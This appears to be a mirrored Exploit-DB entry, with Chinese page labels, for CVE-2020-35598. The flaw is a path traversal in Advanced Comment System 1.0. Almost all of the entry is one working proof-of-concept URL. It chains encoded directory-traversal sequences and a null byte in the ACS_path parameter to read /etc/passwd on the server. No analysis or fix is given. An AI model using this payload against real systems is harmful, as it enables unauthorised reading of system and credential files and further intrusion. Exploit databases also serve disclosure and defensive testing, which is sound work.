Advanced Comment System 1.0 – ‘ACS_path’ Path Traversal

  • 作者: Francisco Javier Santiago Vázquez
    日期: 2021-01-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49343/
  • # Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
    # Date: Fri, 11 Dec 2020
    # Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
    # Vendor Homepage: Advanced Comment System - ACS
    # Version: v1.0
    # CVE: CVE-2020-35598
    
    http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00